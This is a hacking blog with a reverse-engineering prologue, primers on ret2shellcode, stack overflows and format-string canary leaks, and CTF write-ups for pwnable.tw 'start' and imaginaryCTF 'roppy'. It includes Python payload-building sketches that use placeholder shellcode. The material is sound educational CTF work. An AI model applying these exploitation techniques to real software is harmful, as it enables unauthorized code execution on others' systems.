Friday, March 22, 2024

[rev] intro to reversing - PROLOGUE


reversing is definitely one of the hardest and most rewarding skillsets one can possess within cybersecurity, along with exploit development. this post serves as a prologue, preceding the many reversing writeups I plan on publishing on this blog. I plan on going over the most basic "Hello World" C program and developing it further by adding small lines of code little by little to see how each change shows up in the disassembly.

I'm making these blog posts mainly because I've seen inadequacies within my own knowledge base when it comes to reverse engineering. The most fun and effective way to learn anything within security is through CTF. That goes without saying: not only does it encourage one to get their hands dirty, earning them exposure badges, it also encourages autodidactic learning, a technique that involves taking the time to do online research, gathering technical information relevant to the challenge step by step, and adding it all together to finally get to the flag, which earns one points. It's sort of like a treasure hunt. The flag is the treasure and the clues are the tiny bits and pieces of information Google assists you with (Google's the plug fr lol). I've been engaged in CTF for a number of years and only now do I realize that the points one earns do not matter. The real reward/treasure is the actual learning experience. What technical detail were you exposed to before finally getting the flag? How did it challenge your current knowledge base? Those are the questions one needs to ask themselves... especially if you use CTF as a means to have fun and also build real world technical skills.

Everybody has a goal in the field (obviously), as with every field out there besides cybersecurity. And the path towards that goal is never straightforward. However, in the context of reverse engineering programs or software, the path is clear cut. Of course you can cut corners, depending on your overall IT skills and how "tech savvy" you are. Do so, if you so wish. Eventually, the need for a deep understanding of fundamentals will catch up with you and you'll find yourself going back to the beginning, as is the case for me at the time of writing this.

Why didn't I just start out with fundamentals from the beginning? It's simple. Because when I first started, the basics were way too boring. Luckily, CTF filled that void by integrating gamification and real world technical skills together, allowing me to see my progress and move further. Trial and error, reading writeups and just immersing myself in the challenges over and over again allowed me to at least have fun while learning the topics I loved the most.

As stated earlier, my skillset has now reached a stagnant point and I'm definitely not satisfied with it. CTF challenges are now boring, not because they are not engaging and enticing enough, but because my "amateur" skillset does not suffice any longer. I have to increase my knowledge base within reversing to once again rekindle the joy I once had.

Aside from reverse engineering, there is writing exploit scripts, or being an exploit developer. this blog has actually showcased quite a number of CTF binary exploitation challenge write-ups. I've documented the process, techniques and patterns of discovering vulnerabilities within these challenges and writing the exploits that leverage those vulnerabilities to ultimately get the flag. These challenges pique my interest just as much as reversing does, but I can easily and confidently say that reverse engineering remains a paramount skillset for all exploit developers, professional or CTF player alike. After all, the vulnerabilities are all memory corruption based.

So if I am to eventually achieve this goal, I have to increase my skillset. I have to leave CTF alone for now and hit the books! I'm confident enough to say that I believe in my ability to achieve this goal.

Thanks for reading this far if you have. Just wanted to lay a bit of foundation as well as express my own motivations as to why I'm making these next few blog posts. I'll go over quite a bit: Assembly language, using gdb to debug software, understanding stack and heap memory and how they relate to reversing, understanding GUI reversing tools like IDA and many more, so be sure to look out for those. Lots of planning will go into these next few so I'm amped for the challenge. Maybe at the end, I'll do a 'crackme' reversing challenge showcasing what a typical workflow and thought process looks like.







Saturday, February 24, 2024

[pwn-primer] understanding ret2shellcode + understanding stack based buffer overflow

This post is going to cover an essential pwn technique called ret2shellcode, also commonly referred to as Shellcode Injection. In a typical pwn challenge (especially if it's easy), we'll have a win() function to redirect program execution to in order to solve the challenge. However, there are instances where there is no win function. This is where this technique comes in.

Shellcode, in essence, is a sequence of assembly instructions that can execute arbitrary commands. In real exploits, it's used to either spawn a shell (either root/admin or low privilege) or execute commands like displaying the contents of a critical file. In the case of pwn CTF challenges, it's used to spawn a shell on the remote server to get the flag or to display the contents of flag.txt.

I'll go over a simple program that can be exploited with the use of shellcode.


The program above is quite simple in nature. It just has a main function that defines a character buffer of 256 bytes on the stack. After that, a printf call is made displaying the address in memory where the buffer_one character buffer is located. Then a gets call reads input into the buffer_one buffer.

Guess this is a good time to explain the vulnerability.

The vulnerability in this program is found at the gets call. Why? Because the buffer_one character buffer has been given a length of 256 bytes on the stack, and the gets call asks for user input. The vulnerability lies in the fact that gets() has no idea how big the buffer is and never checks that at most 256 bytes are written to it. The user input can exceed 256 bytes, overwriting whatever sits next to the buffer on the stack.

All this is occurring in a region of memory called the stack. Every function call in a C program gets, at runtime, its own area of the stack (referred to as a stack frame). These stack frames hold the local variables of the functions they belong to. For example, in the program above, there is one stack frame for the 'main' function and the character buffer is considered to be 'local' to the main function stack frame. The stack operates using PUSH and POP operations: PUSH places data on top of the stack and POP takes data off of it.

A buffer overflow vulnerability can occur on the stack or in another region of memory used for dynamic allocation called the heap, but for this post we will focus on the stack. A stack overflow vulnerability in this case means we can write past the specified buffer size, reaching other important data on the stack, such as other local variables, the saved base pointer and, most importantly, the saved return address.

On the stack, the return address is essentially an address that points to where execution is supposed to continue once the respective function has finished executing. By overwriting this saved return address with an address of our own, we can redirect execution to wherever we want.
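To make the overwrite a bit more concrete, here's a rough Python model of main's stack frame. It assumes the simplest possible layout (the 256-byte buffer directly followed by the saved base pointer and the saved return address, with no compiler padding). The saved values and the `unchecked_copy` helper are made up for illustration, so treat it as a sketch and not as what the real frame looks like.

```python
import struct

BUF_SIZE = 256                 # size of buffer_one in the post
SAVED_RBP = 0x7FFD00001000     # made-up saved base pointer
SAVED_RET = 0x401234           # made-up saved return address


def make_frame():
    """Model the frame as: buffer | saved rbp | saved return address."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", SAVED_RBP, SAVED_RET))


def unchecked_copy(frame, data):
    """Mimic gets(): copy everything we are given, never look at BUF_SIZE."""
    frame[0:len(data)] = data
    return frame


def saved_return_address(frame):
    """Read the 8 bytes that sit right after the buffer and the saved rbp."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


# Short input stays inside the buffer, so the return address survives.
ok = unchecked_copy(make_frame(), b"hello")
print(hex(saved_return_address(ok)))

# 256 bytes of junk + 8 bytes over saved rbp + our own address.
evil = b"A" * BUF_SIZE + b"B" * 8 + struct.pack("<Q", 0xDEADBEEF)
smashed = unchecked_copy(make_frame(), evil)
print(hex(saved_return_address(smashed)))
```

The second copy is the whole idea of the attack in miniature: nothing stops the write at byte 256, so the last 8 bytes of the input land exactly where the return address lives.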

Let's go back to the program and see this in action. 

After compiling the program with gcc, we see the program output once executed.


As seen in the source code, the program outputs the address of where the buffer sits on the stack. The next line is empty, showing the program hanging while it waits for input. This is where the gets() call is being made. By inserting more than 256 bytes, the program should crash. A crash in the program confirms the presence of the buffer overflow vulnerability.


Junk bytes inserted into the program result in a segmentation fault. The program has crashed and the vulnerability is confirmed. There's no win function to redirect execution to, as discussed before, so shellcode will have to be used. pwntools is a Python library that assists with exploit script writing. It ships with a range of ready-made shellcode for different operations across different architectures. In our case, we're working with a 64 bit program, so the shellcode will be 64 bit.

execve('/bin/sh') syscall shellcode


the shellcode above performs an execve syscall with the path '/bin/sh' as its parameter to spawn a shell. If you're not well versed in how parameters are passed in 64 bit assembly, then I recommend reading up on that. The first 4 instructions push the path string onto the stack and finally put a pointer to it into rdi. The constant 0x732f2f2f6e69622f is the little-endian encoding of the bytes '/bin///s'; the extra slashes are padding, and the kernel resolves '/bin///sh' the same way as '/bin/sh'. The following instructions perform XOR and stack PUSH/POP operations to set up the remaining arguments and ultimately invoke execve.
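If you want to check what that constant really holds, a couple of lines of Python will do it. This only decodes the value quoted above; where the trailing 'h' and the NUL terminator come from is not shown here, since that depends on the rest of the listing.

```python
import struct

CONSTANT = 0x732F2F2F6E69622F  # the value quoted in the post


def decode_qword(value):
    """Return the 8 bytes of a 64-bit value in the order they sit in memory.

    x64 is little-endian, so the least significant byte comes first.
    """
    return struct.pack("<Q", value)


print(decode_qword(CONSTANT))
```

Reading the bytes in memory order is what makes the path readable; printed as a plain number, the string looks reversed.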

Final Exploit Script


the exploit script is quite simple. most of it is utilizing pwntools methods. I can't overemphasize how easy pwntools has made writing exploits. All the script does is use shellcraft.sh(), which generates the same execve shellcode we saw above. The next section takes the stack address the program prints, parses it as a base 16 (hexadecimal) number and prints it to the screen. Lastly, the real payload is organised in order: the shellcode plus capital A's (junk bytes) to fill the 256-byte buffer_one buffer on the stack, more junk bytes (0xcafebabe) to overwrite the saved rbp, and finally the buffer address to overwrite the saved return address, so that rip ends up pointing at the buffer. This places the shellcode on the stack and redirects execution to where it has been injected, ultimately executing our own code.
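For anyone who wants to see the payload layout without pwntools installed, here's a minimal sketch using only the standard library. It assumes the program prints the buffer address as a bare hex string, that the shellcode sits at the start of the buffer, and that the saved rbp comes right after the 256 bytes. `FAKE_SHELLCODE`, `parse_leak` and `build_payload` are hypothetical names, and the placeholder bytes stand in for the assembled shellcraft.sh() output.

```python
import struct

BUF_SIZE = 256
FAKE_SHELLCODE = b"\xcc" * 48  # placeholder bytes, NOT real execve shellcode


def parse_leak(line):
    """Turn the printed address, e.g. b'0x7ffd1234abcd\n', into an integer."""
    return int(line.decode().strip(), 16)


def build_payload(buf_addr, shellcode):
    """shellcode + 'A' filler | junk for saved rbp | buffer address for rip."""
    if len(shellcode) > BUF_SIZE:
        raise ValueError("shellcode does not fit in the buffer")
    payload = shellcode.ljust(BUF_SIZE, b"A")   # fill buffer_one
    payload += struct.pack("<Q", 0xCAFEBABE)    # overwrite saved rbp
    payload += struct.pack("<Q", buf_addr)      # overwrite saved return address
    return payload


buf_addr = parse_leak(b"0x7ffd1234abcd\n")      # made-up example leak
payload = build_payload(buf_addr, FAKE_SHELLCODE)
print(len(payload), hex(buf_addr))
```

In the real script the same three pieces would be sent with pwntools after reading the leak from the process; the layout is the part that matters.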

the exploit ran and we can see we have a shell. Quite a simple technique. I'm sure I butchered some of the explanation but essentially this is how shellcode works. We inject it onto the stack of a vulnerable process and have execution point to where the shellcode was injected.


Thursday, February 22, 2024

[pwn primer] understanding format string vulnerabilities + bypassing stack canary protection

Previously, we've covered techniques like ret2shellcode, which involves injecting shellcode into a vulnerable process to execute whatever code we want, and the use of ROP gadgets, which is a code reuse attack. There we use code already located within the vulnerable program, specifically instruction sequences ending with the 'ret' instruction, to set up the stack and execute whatever code we want, bypassing the non-executable (NX) bit that prevents injected shellcode on the stack from executing.

Another exploitation technique is the use of format string exploits. This technique involves abusing format specifiers in C. Manipulating format strings in C can basically allow one to read from and write to arbitrary memory locations. I've created a reasonably easy C program that has a format string vuln. Let's have a look at it and take it from there.



the main function calls vuln, which initializes a buffer of 64 bytes on the stack. after that, a couple of puts and gets calls are made. puts just outputs predefined text onto the screen and gets is the vulnerable function, vulnerable specifically to a buffer overflow (read the man pages to see the dangers of using gets). To cut the story short, gets() basically prompts for user input without doing any bounds checking on how much input is being inserted.

the format string vulnerability can be spotted on line 13. the printf function in C expects a format string as its first argument, telling printf how to "print" data onto the screen through specifiers such as %d for decimal, %s for strings etc (more can be found online). in this case, the code does not tell printf how to print the data and our input ends up being treated as the format string itself, hence the vulnerability. We can feed printf any specifier we want and see what contents are spewed from the program.

How does this vulnerability benefit anyone? I'll show you how.

The format string vulnerability can be used to either read from or write to arbitrary areas in memory. This can prove useful in instances where certain exploit mitigations such as ASLR or stack canaries need to be bypassed. This post will also go into actually compiling and exploiting the vulnerable program above. This program mimics an easy/medium pwn challenge. Looking at the code overall, we also see a win() function, so this is more of a ret2win type of challenge.

p.s. ret2win basically just means that the vulnerable pwn challenge contains a 'win' function that program execution needs to be redirected to in order to solve the challenge. the 'win' function isn't called initially. that's why program execution needs to be redirected to that function (usually done when there's a buffer overflow vuln).

The code above can be compiled using the flags in the commented section (one set for 32 bit and one for 64 bit). This demo will look at the 64 bit build.

After compiling the program, let's have a look at the binary protections and see what exploit mitigations are enabled to get a feel for what we're dealing with.


We have 2 protections enabled. a stack canary and NX bit. The NX bit, we've already discussed. it basically just renders shellcode injections useless as the stack is non executable. cool. but the stack canary is what we haven't covered... and I'd like to do that now.

The stack canary is simply a random value placed on the stack meant to prevent buffer overflows from being successful. Specifically, on x64 Linux it is a random 8-byte value whose first byte in memory is '\x00', placed at rbp-0x8 (8 bytes below the base pointer). To give more clarity on this, let's have a look at the vulnerable program in a disassembler and see how the canary is initialised.


A quick IDA inspection shows the execution branches of the vuln function, where most of the program functionality is. The function prologue at the very beginning shows 50h bytes being reserved on the stack for this function. Right after that we see fs:28h being moved into the rax register, and then that value being stored in a stack slot relative to rbp. This is the stack canary being initialised. IDA typically writes such a slot as rbp+var_8, where var_8 is a negative offset (-8), so it is the same rbp-0x8 location that gdb shows; the two tools just print it differently.

At the end, we see the stack canary being compared with what is on the stack. If the user input overwrote the value at rbp-0x8, and what was written there does not match the random value assigned at runtime, then __stack_chk_fail is called, reporting that a buffer overflow has been detected, and the program aborts.

That's how a stack canary works. 

Since the program has initialized a random value at rbp-0x8, then we need to find a way to use the format string vuln to leak the canary value from the stack, as that will be the mechanism with which the canary protection can be bypassed in this instance. Besides this, you can bruteforce the canary byte by byte, but right now the format string can allow us to leak it directly from the stack.

by inserting %p into the program, we can leak the contents of the stack to stdout, and it turns out that the canary can be found at the 15th position of %p inserted into the program.



since the canary's lowest byte is '\x00' as stated earlier, the leaked value ending in 00 is the canary. It shows up at the end of the printed number because of endianness: x64 is little-endian, so the least significant byte (the 00) is stored first in memory but printed last by %p. However, the canary is regenerated on every execution, so the final exploit script will automate this process and make it cleaner. Aside from that, this is how the format string vuln can be used. This is an essential pwn technique and can get a lot more advanced than this. This is as basic as it gets.

The final exploit payload will be the padding + canary_leak + additional 8 bytes to overwrite rbp + address to win function (overwrite rip address with win function)
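Here's a rough sketch of that payload order in plain Python (no pwntools needed to run it). A few things are assumptions on my side: the padding length of 72 (0x50 reserved bytes minus the 8 bytes of canary at rbp-0x8, assuming the buffer starts at the bottom of the frame), the `%15$p` direct-argument form as a shortcut for the 15th %p, and the win() address, which is a made-up placeholder.

```python
import struct

PADDING_LEN = 72          # assumed distance from buffer start to the canary
WIN_ADDR = 0x401196       # hypothetical address of win(), take yours from the binary


def leak_request(position=15):
    """Format string that asks printf for the Nth argument as a pointer."""
    return "%{}$p".format(position).encode()


def parse_canary(leak):
    """Parse e.g. b'0x1122334455667700\n' and sanity check the low 00 byte."""
    value = int(leak.decode().strip(), 16)
    if value & 0xFF != 0:
        raise ValueError("this does not look like a canary (low byte is not 00)")
    return value


def build_payload(canary, win_addr, padding_len=PADDING_LEN):
    """padding | canary | 8 bytes over saved rbp | win() as return address."""
    payload = b"A" * padding_len
    payload += struct.pack("<Q", canary)     # put the canary back untouched
    payload += b"B" * 8                      # overwrite saved rbp
    payload += struct.pack("<Q", win_addr)   # overwrite saved return address
    return payload


canary = parse_canary(b"0x1122334455667700\n")   # made-up example leak
print(leak_request(), hex(canary), len(build_payload(canary, WIN_ADDR)))
```

The important detail is that the canary is written back exactly as leaked, so the check at the end of vuln still passes even though everything after it has been overwritten.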

Final Exploit Script



The exploit script is quite small, but all it will do is exploit the format string vuln to leak the canary and ultimately bypass it. As seen above, once the exploit script is run, it leaks the canary from the vulnerable process and shows us the message "you win", signifying that we've successfully redirected execution to the win() function.

Hopefully this shed a bit more light on how the format string vuln works. This vulnerability can be discovered and used in other ways not mentioned here, but this is enough to serve as a primer for beginner or intermediate pwners who want to up their game with pwning. Learning the art of pwn requires knowledge of reversing, which is a topic worthy of being discussed in another blog post I will do in future.

More resources:

pwn.college - Hacking platform maintained by Arizona State University. They also host lectures available on twitch and youtube. Highly recommended for beginner pwners.

CTF-Wiki - Overall CTF wiki teaching basics of pwn as well as other hacking challenges like Crypto, Web and Forensics. Highly recommended (translate the page to English as it's originally written in Chinese).










Saturday, February 17, 2024

[pwnable_tw - pwn] start (100 pts)

This pwn challenge is quite easy. got nervous at first but eventually got it. the challenge provides a netcat IP and port to run the exploit script against, as well as the 32 bit binary that's running on that port for local debugging. so, let's look at the binary.



Challenge has every protection disabled which just indicates any shellcode injection into the challenge process will work as the stack is executable. Running the binary just asks for user input and simply exits after input is given. Let's look at what's happening under the hood.

The binary is stripped so the symbols are not present for us to see. However, an entry function is present in the disassembly.


entry0() function does a few things:

- pushes esp and _exit onto the stack

- performs xor operations on eax, ebx, ecx and edx (which basically zeroes out these registers)

- pushes a total of 20 bytes onto the stack (which turns out to be the "Let's start the CTF:" string the binary outputs when it executes)

- calls the write() syscall (mov al, 4 selects sys_write on 32 bit Linux; mov bl, 1 sets the file descriptor to stdout)

- calls the read() syscall (syscall number 3 in al selects sys_read) and receives up to 60 bytes of input

- adds 20 to esp, moving it past the 20-byte string

- finally a 'ret' instruction is executed, which pops the saved _exit() address into eip (0x804809d = _exit() address)


To exploit the challenge, a couple of things need to be done. Firstly, we need to utilise the buffer overflow vuln to gain eip control and leak the stack address. since the NX bit is disabled, shellcode injection into the challenge process is viable, with a twist. usually a 'jmp esp' instruction would be used to have program execution jump to the injected shellcode, as it's located on the stack when it's injected. However, the 'jmp esp' gadget is not in the binary, so another gadget has to be used to leak the stack address instead.


The gadget above is actually part of the entry function itself, specifically the instructions from the mov ecx, esp up to the ret. If analyzed carefully, returning here puts eip back at the point in the program just before the syscalls are set up and invoked again (state of program before = 0x08048086 approx., gadget start = 0x08048087). Running the output syscall again with the current esp is what leaks the stack address.


the payload = padding (input buffer to eip_control offset) + (stack address + length of the padding) + shellcode. In other words, the new return address is the leaked stack address plus the padding length, which is where the shellcode ends up. As seen above, the padding, which is user input, starts at esp + 0, the top of the stack. The shellcode was taken from the shell-storm website.
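The two stages can be sketched in plain Python like this. The padding length of 20 comes from the 20-byte string entry0 pushes, and the gadget address is the 0x08048087 quoted above. That the first 4 leaked bytes are the stack address and that the input is capped at 60 bytes are assumptions based on the description in this post, and the shellcode here is just placeholder bytes.

```python
import struct

PADDING_LEN = 20           # bytes between the start of our input and the return address
LEAK_GADGET = 0x08048087   # address quoted in the post
MAX_INPUT = 60             # read() accepts at most 60 bytes


def stage1():
    """Overflow once to jump back into entry0 and make it print the stack."""
    return b"A" * PADDING_LEN + struct.pack("<I", LEAK_GADGET)


def parse_stack_leak(data):
    """Assume the first 4 bytes written back are the saved stack address."""
    return struct.unpack("<I", data[:4])[0]


def stage2(stack_addr, shellcode):
    """NOP padding | (leak + padding length) | shellcode."""
    payload = b"\x90" * PADDING_LEN
    payload += struct.pack("<I", stack_addr + PADDING_LEN)
    payload += shellcode
    if len(payload) > MAX_INPUT:
        raise ValueError("payload is longer than what read() will accept")
    return payload


leak = parse_stack_leak(b"\x00\xd0\xff\xff" + b"junk")  # made-up leak bytes
print(hex(leak), len(stage2(leak, b"\xcc" * 23)))        # placeholder shellcode
```

The 60-byte cap is worth keeping in mind when picking shellcode: with 24 bytes used for padding and the return address, only 36 bytes are left.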

Normally the padding would be a bunch of 0x41 (A) bytes up to eip control, but utilising a NOP sled (a run of 0x90 bytes, each an instruction that does nothing) yielded a more successful result.

Final exploit script





pwned.

 


Tuesday, February 6, 2024

[imaginaryCTF - pwn] roppy (75 pts)

Hi. back with another writeup for the imaginaryCTF 'roppy' pwn challenge. This challenge is old but still a good one to brush up on basic pwning.

Challenge description:


Challenge description shows that it's just another rop challenge. means that the stack protection NX is probably enabled. we can run checksec on the binary to confirm the suspicion:


As suspected, NX is enabled. So a ret2shellcode attack won't work. The offset from user input to the saved return address (RIP control) is 72 bytes. This can be calculated by creating a cyclic pattern of 100 bytes, loading the binary in pwndbg (a gdb extension), feeding it the pattern, and calculating the offset with 'cyclic -l'.


next, we jump to the middle of the main function to execute system("/bin/sh") and finally get a shell. The address of the middle of the main function can be found in gdb.
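The offset hunt and the final payload can be sketched without pwntools as well. The pattern generator below is a simple stand-in (upper/lower/digit triples), not the de Bruijn sequence that 'cyclic' actually produces, and `TARGET_ADDR` is a hypothetical placeholder for the address inside main that you'd read out of gdb.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits

TARGET_ADDR = 0x401150   # hypothetical address in the middle of main


def pattern_create(length):
    """Build a non-repeating pattern like Aa0Aa1Aa2... of the given length."""
    chunks = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length].encode()
    raise ValueError("requested length is longer than the pattern can cover")


def pattern_offset(pattern, window):
    """Find where the bytes that landed in the return address sit in the pattern."""
    return pattern.find(window)


def build_payload(offset, target):
    """padding up to the saved return address, then the address to jump to."""
    return b"A" * offset + struct.pack("<Q", target)


pattern = pattern_create(100)
crash_bytes = pattern[72:80]          # pretend these 8 bytes showed up at the crash
offset = pattern_offset(pattern, crash_bytes)
print(offset, len(build_payload(offset, TARGET_ADDR)))
```

Same idea as 'cyclic -l': because every window in the pattern is unique, the bytes sitting in the return address at crash time tell you exactly how much padding you need.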

Exploit script.




exploit script works. we get shell!